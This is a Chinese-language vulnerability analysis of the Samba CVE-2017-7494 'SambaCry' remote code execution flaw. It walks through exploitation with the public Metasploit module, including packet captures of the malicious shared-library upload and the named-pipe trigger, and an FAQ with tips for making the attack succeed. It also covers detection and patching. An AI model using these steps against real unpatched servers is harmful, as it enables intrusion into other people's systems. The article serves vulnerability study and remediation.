0x01 引子
2017年5月24日Samba官方發(fā)布了安全公告，新發(fā)布的Samba 4.6.4修復(fù)了一個嚴(yán)重的代碼執(zhí)行漏洞(CVE-2017-7494)，該漏洞影響了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中間的所有版本。在rpc_server/srv_pipe.c中的存在一個驗證BUG，攻擊者可以利用客戶端上傳惡意動態(tài)庫文件到具有可寫權(quán)限的共享目錄中，之后發(fā)出請求，使服務(wù)器加載Samba運(yùn)行目錄以外的非法模塊，導(dǎo)致惡意代碼執(zhí)行。
Samba，是種用來讓UNIX系列的操作系統(tǒng)與微軟Windows操作系統(tǒng)的SMB/CIFS網(wǎng)絡(luò)協(xié)議做鏈接的自由軟件。很多企業(yè)或個人的 NAS(Network Attached Storage)，路由器和其他IOT設(shè)備存儲解決方案會選擇開源軟件Samba提供數(shù)據(jù)訪問服務(wù)。IPC$(Internet Process Connection) 是共享 “命名管道” 的資源，能使用戶匿名訪問Samba服務(wù)器的共享資源。
0x02 漏洞影響分析
基于360天眼實驗室全網(wǎng)掃描的數(shù)據(jù)顯示，目前中國大陸及港澳臺開放445端口的IP數(shù)為18883個，其中Samba服務(wù)共4433個，而Samba版本落在漏洞版本區(qū)間的IP數(shù)為3765個，占到了Samba服務(wù)的85%！臺灣、香港分別為1767、1853個，其余各省分布如下圖所示。

0x03 漏洞驗證及分析
環(huán)境準(zhǔn)備：

使用Metasploit公開的exploits模塊(is_known_pipename)進(jìn)行測試。下載地址：https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/samba/is_known_pipename.rb 
攻擊過程：
1. 向具有寫權(quán)限的Samba服務(wù)器共享目錄中上傳惡意動態(tài)庫，這里命名為evil.so;
2. 攻擊者暴力猜解共享目錄的絕對路徑，同時以IPC$(命名管道)資源的方式請求步驟1上傳的惡意動態(tài)庫，使文件名變?yōu)榉��?wù)器上的絕對路徑” /path/to/evil.so”;
3. 服務(wù)器端誤將文件資源 ” /path/to/evil.so” 當(dāng)作IPC$(命名管道)資源加載運(yùn)行，漏洞觸發(fā)。
1）上傳惡意動態(tài)庫文件到服務(wù)器共享目錄public

第51個包Write AndX Request寫操作請求數(shù)據(jù)，如下所示:
SMB (Server Message Block Protocol)
    SMB Header
        Server Component: SMB
        [Response in: 52]
        SMB Command: Write AndX (0x2f)
        Error Class: Success (0x00)
…
        Tree ID: 51295  (\\192.168.119.155\public) #訪問靶機(jī)共享文件路徑Tree ID
        Process ID: 51988
        User ID: 62509
        Multiplex ID: 27235
    Write AndX Request (0x2f)
        Word Count (WCT): 14
        AndXCommand: No further commands (0xff)
        Reserved: 00
        AndXOffset: 0
        FID: 0xef37 (\rDfDKbgV.so) # 惡意動態(tài)庫文件FID
…
        [File RW Length: 476] #寫入文件大小
        Byte Count (BCC): 476
Data (476 bytes) #上傳二進(jìn)制數(shù)據(jù)
    Data: 7f454c4602010100000000000000000003003e0001000000...
[Length: 476]
2）以命名管道方式請求惡意動態(tài)庫

第59個包NT Create AndX Request 請求命名管道資源數(shù)據(jù)，如下所示：
SMB (Server Message Block Protocol)
    SMB Header
        Server Component: SMB
        SMB Command: NT Create AndX (0xa2)
        …
        Tree ID: 19967  (\\192.168.119.155\IPC$) #這里使用命名管道方式很重要
        Process ID: 51988
        User ID: 62509
        Multiplex ID: 27235
    NT Create AndX Request (0xa2)
        Word Count (WCT): 24
        AndXCommand: No further commands (0xff)
        Reserved: 00
        AndXOffset: 0
        Reserved: 00      File Name Len: 23
        Create Flags: 0x00000016
        Root FID: 0x00000000
        …
        Byte Count (BCC): 24
        File Name: /home/samba/rDfDKbgV.so # 管道名稱即為前面上傳文件的絕對路徑
3）服務(wù)器加載惡意動態(tài)庫
Smbd服務(wù)進(jìn)程詳細(xì)調(diào)用鏈，如下如所示：

Samba漏洞關(guān)鍵源代碼位置，如下如所示：

由于沒有對pipename的值做判斷，smb_probe_module函數(shù)調(diào)用執(zhí)行在共享目錄下上傳so的文件，進(jìn)而導(dǎo)致惡意代碼執(zhí)行漏洞。

Metaspoit中提供在SMB_SHARE_BASE的列表用于猜解，共享目錄的絕對路徑。筆者直接設(shè)置可正確的Samba共享目錄絕對路徑，可以確保一次通過。
0x04 檢測漏洞是否存在
1） 本地檢測：本地檢查Samba版本是否屬于 4.4.14、 4.5.10、4.6.4 及以后的版本。
2） 遠(yuǎn)程檢測：使用nmap --script=smb-os-discovery -p 445 192.168.1.122/24命令掃描網(wǎng)絡(luò)中Samba版本。
0x05 漏洞修復(fù)
1. Samba 官方已經(jīng)提供了新版本來修復(fù)上述漏洞，請受影響的用戶盡快升級到新版本。使用源碼安裝的 Samba 用戶，請盡快下載最新的 Samba 版本手動更新；使用二進(jìn)制分發(fā)包（RPM 等方式）的用戶立即進(jìn)行 yum，apt-get update 等安全更新操作。
下載鏈接如下： 
https://download.samba.org/pub/samba/stable/samba-4.6.4.tar.gz https://download.samba.org/pub/samba/stable/samba-4.5.10.tar.gz https://download.samba.org/pub/samba/stable/samba-4.4.14.tar.gz 
2. 緩解措施：通過在 smb.conf 的[global]節(jié)點(diǎn)下增加 nt pipe support = no選項， 然后重新啟動Samba 服務(wù)，以此達(dá)到緩解針對該漏洞攻擊的效果。
0x06 FAQ
1）很多童鞋在ubuntu16.04或者centos6.8上沒有驗證成功，是so不對？metasploit版本不對？還是靶機(jī)環(huán)境不對？
答：
a) kali上的metasploit保證最新，然后只需下載對應(yīng)的is_known_pipename.rb模塊，放入/usr/share/metasploit-framework/modules/exploits/linux/samba/目錄即可;
b) 使用metasploit自帶的payload生成模塊即可，默認(rèn)為reverse TCP;
c) 本次測試靶機(jī)的smb.conf設(shè)置如下：
[public]
path = /home/samba
public = yes
writable = yes
browseable = yes
guest ok = yes
read list = nobody
write list = nobody
能觸發(fā)漏洞的配置文件版本很多，writable = yes是必需的，global里有個security設(shè)置，刪除后默認(rèn)是匿名訪問。
d) 本次測試共享目錄/home/samba的權(quán)限為777;
e) 重點(diǎn)：2017年5月24日以后使用apt或者yum安裝的smb服務(wù)基本都是打過補(bǔ)丁的，所以不可能利用成功。
2）如何在ubuntu下查看Samba的完整版本？
a) apt install apt-show-versions
b) apt-show-versions samba

c) 位置1是Samba版本，位置2是ubuntu補(bǔ)丁版(ubuntu0.16.04.7)，可以參見ubuntu的修改日志http://changelogs.ubuntu.com/changelogs/pool/main/s/samba/samba_4.3.11+dfsg-0ubuntu0.16.04.7/changelog，可以看到已經(jīng)修復(fù)了漏洞CVE-2017-7494。
3）如何查看centos已經(jīng)修復(fù)的版本？
筆者這里找到的是RHEL的更新日志，redhat也在5月24日緊急更新了所有在維護(hù)的Samba包，修復(fù)漏洞CVE-2017-7494。文章詳見：https://rhn.redhat.com/errata/RHSA-2017-1270.html。